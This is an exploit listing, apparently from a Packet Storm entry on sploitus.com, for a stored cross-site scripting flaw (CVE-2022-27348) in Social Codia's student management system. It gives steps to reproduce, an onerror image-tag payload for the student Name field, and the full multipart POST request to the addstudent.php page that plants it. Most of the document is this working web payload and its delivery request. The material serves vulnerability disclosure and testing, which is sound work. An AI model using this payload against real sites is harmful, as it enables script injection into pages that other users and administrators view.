Exploit for Social Codia SMS 1 Cross Site Scripting CVE-2022-27348

Name: Exploit for Social Codia SMS 1 Cross Site Scripting CVE-2022-27348
Rating: 5 (314 reviews)
2022-04-08 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:166650
# sms-Add_Student-Stored_XSS-POC  
# Author: D4rkP0w4r   
  
Description => Stored_XSS at Add Student  
  
# Step to Reproduct  
* Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name  
  
# Exploit  
* Input payload at Enter Name -> clicked Add Students -> access All Student -> The XSS will trigger  
* Log out admin and typed roll number -> The XSS will trigger  
  
# Vulnerable Code  
* When inserting into the database, the input is not filtered out bad characters  
  
# POC   
* Injection Point   
  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="name"  
  
<img/src/onerror=prompt(10)>  
  
* Request  
  
POST /sms/admin/addstudent.php HTTP/1.1  
Host: localhost:8080  
Content-Length: 992  
Cache-Control: max-age=0  
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost:8080  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost:8080/sms/admin/addstudent.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k  
Connection: close  
  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="image"; filename="car.png"  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="rollno"  
  
1234567  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="name"  
  
<img/src/onerror=prompt(10)>  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="contact"  
  
123456  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="standerd"  
  
1  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="city"  
  
Newyork  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="email"  
  
haha@gmail.com  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="gender"  
  
male  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K  
Content-Disposition: form-data; name="submit"  
  
  
------WebKitFormBoundaryAvKt9LM2RnnkuA0K--